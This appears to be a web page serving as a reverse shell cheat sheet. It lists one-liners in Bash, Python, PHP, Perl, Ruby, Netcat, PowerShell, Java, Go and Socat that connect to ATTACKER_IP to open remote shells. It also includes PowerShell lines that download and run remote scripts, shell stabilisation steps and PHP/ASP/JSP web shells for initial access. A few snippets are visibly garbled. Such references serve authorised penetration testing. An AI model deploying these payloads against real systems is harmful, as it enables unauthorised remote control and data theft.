A complete reverse shell reference organized by language and platform. Always set up your listener before triggering the shell.
Listener Setup set PAYLOAD linux/x64/shell/reverse_tcpset LHOST 0.0.0.0set LPORT 4444
Bash bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1' exec 5<>/dev/tcp/ATTACKER_IP/4444; cat <&5 | while read line; do $line 2>&5 >&5; done exec 196<>/dev/tcp/ATTACKER_IP/4444; sh <&196 >&196 2>&196
Python 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 'import pty,socket,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));[os.dup2(s.fileno(),f) for f in (0,1,2)];pty.spawn("/bin/bash")'
PHP '$sock=fsockopen("ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");' '$sock=fsockopen("ATTACKER_IP",4444);$proc=proc_open("/bin/sh -i",array(0=>$sock,1=>$sock,2=>$sock),$pipes);' $_GET ['cmd' ]); ?>'system($_GET["c"]);'
Perl perl -e 'use Socket;$i="ATTACKER_IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' '$c=new IO::Socket::INET(PeerAddr,"ATTACKER_IP:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Ruby ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 'exit if fork;c=TCPSocket.new("ATTACKER_IP","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
Netcat nc -e /bin/sh ATTACKER_IP 4444rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP 4444 > /tmp/fmknod /tmp/backpipe p && nc ATTACKER_IP 4444 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe
PowerShell (Windows) -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("ATTACKER_IP" ,4444 );$stream =$client .GetStream();[byte []]$bytes =0 ..65535 |%{0 };while (($i =$stream .Read($bytes ,0 ,$bytes .Length))-ne 0 ){;$data =(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes ,0 ,$i );$sendback =(iex $data 2 >&1 |Out-String );$sendback2 =$sendback +"PS " +(pwd ).Path+">" ;$sendbyte =([text.encoding ]::ASCII).GetBytes($sendback2 );$stream .Write($sendbyte ,0 ,$sendbyte .Length);$stream .Flush()};$client .Close()$cmd = 'IEX (New-Object Net.WebClient).DownloadString("http://ATTACKER_IP/Invoke-PowerShellTcp.ps1")' $bytes = [System.Text.Encoding ]::Unicode.GetBytes($cmd )$b64 = [Convert ]::ToBase64String($bytes )-enc $b64 "IEX(New-Object Net.WebClient).downloadString('http://ATTACKER_IP/shell.ps1')"
Java r = Runtime.getRuntime(); p = r.exec(new String[]{"/bin/bash" ,"-c" ,"exec 5<>/dev/tcp/ATTACKER_IP/4444;cat <&5 | while read line; do $line 2>&5 >&5; done" }); p.waitFor();
Go package mainimport "os/exec" ; import "net" func main () "tcp" , "ATTACKER_IP:4444" )"/bin/sh" )
Socat tty `,raw,echo =0 tcp-listen:4444exec :'bash -li' ,pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4444
Shell Stabilization (Post-Shell Upgrade) After catching a basic shell:
'import pty; pty.spawn("/bin/bash")' stty raw -echo ; fg export TERM=xtermstty raw -echo ; fg export SHELL=bash TERM=xterm-256colorstty rows 40 columns 150tty `,raw,echo =0 tcp-listen:4445exec :'bash -li' ,pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:4445
Encrypted Reverse Shell (SSL)
Web Shells for Initial Access <?php system ($_GET ['c' ]); ?> <?php passthru ($_REQUEST ['c' ]); ?> <?php echo shell_exec ($_GET ['c' ]); ?> <?= `$_GET [c]`?> Write (CreateObject ("WScript.Shell" ).Exec (Request ("cmd" )).StdOut.ReadAll ()) %>getRuntime ().exec (request.getParameter ("cmd" )) %>
Revshell Generator
No comments yet. Be the first.